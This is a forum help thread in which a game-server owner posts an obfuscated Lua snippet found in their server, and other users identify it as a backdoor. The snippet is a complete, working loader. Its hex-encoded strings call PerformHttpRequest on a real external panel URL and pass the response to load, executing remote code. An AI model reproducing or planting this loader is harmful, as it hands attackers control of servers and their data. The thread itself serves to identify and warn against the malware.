Random Generated Local

Hey,

I found a problem where server crash by self.
Looking through code i found this

local upDnQyNTUIpwerXLHxzMGeCKEKUrTucDNYNodLtCIxvllqHmRNXpudKppvixekvCaEBJxu = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} upDnQyNTUIpwerXLHxzMGeCKEKUrTucDNYNodLtCIxvllqHmRNXpudKppvixekvCaEBJxu[4][upDnQyNTUIpwerXLHxzMGeCKEKUrTucDNYNodLtCIxvllqHmRNXpudKppvixekvCaEBJxu[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x4a\x54\x4a\x79\x4f\x50", function (qvnrjRyiYwcvenQHdAOduVfTFsjCKCBlDCJxhqGGQajiHIvLmmxFAeFpYmkPchhXhMLufU, vwgKobgeeTfKzfaIHaflpxzbsXhRnNdEKLpNCZtjlsLuGROMJzZlmXhiSFVtDkZCOPkazq) if (vwgKobgeeTfKzfaIHaflpxzbsXhRnNdEKLpNCZtjlsLuGROMJzZlmXhiSFVtDkZCOPkazq == upDnQyNTUIpwerXLHxzMGeCKEKUrTucDNYNodLtCIxvllqHmRNXpudKppvixekvCaEBJxu[6] or vwgKobgeeTfKzfaIHaflpxzbsXhRnNdEKLpNCZtjlsLuGROMJzZlmXhiSFVtDkZCOPkazq == upDnQyNTUIpwerXLHxzMGeCKEKUrTucDNYNodLtCIxvllqHmRNXpudKppvixekvCaEBJxu[5]) then return end upDnQyNTUIpwerXLHxzMGeCKEKUrTucDNYNodLtCIxvllqHmRNXpudKppvixekvCaEBJxu[4][upDnQyNTUIpwerXLHxzMGeCKEKUrTucDNYNodLtCIxvllqHmRNXpudKppvixekvCaEBJxu[2]](upDnQyNTUIpwerXLHxzMGeCKEKUrTucDNYNodLtCIxvllqHmRNXpudKppvixekvCaEBJxu[4][upDnQyNTUIpwerXLHxzMGeCKEKUrTucDNYNodLtCIxvllqHmRNXpudKppvixekvCaEBJxu[3]](vwgKobgeeTfKzfaIHaflpxzbsXhRnNdEKLpNCZtjlsLuGROMJzZlmXhiSFVtDkZCOPkazq))() end)

When server crash getting to crash:

So my question is can that local do crash?

This is obfuscated Lua code, highly recommended not using it. Often such code contains backdoors to do malicious stuff on your server. And yes, it can lead to crashes.

This is random created code.

This code is a backdoor which would allow a malicious actor (whoever sent you this script I guess) to do whatever he wants with your server machine. This backdoor can steal your resources, drop/dump database, steal server key and even use your server in DDOS, literally everything.

I highly recommend to reinstall your OS with data wipe, as it most likely has been infected. If you don’t remember adding this code yourself then it’s 100% means that backdoor started to spread across your server.

Do not download resources from anywhere except this forum and tebex. Especially avoid all the “free leaked” stuff.

2 Likes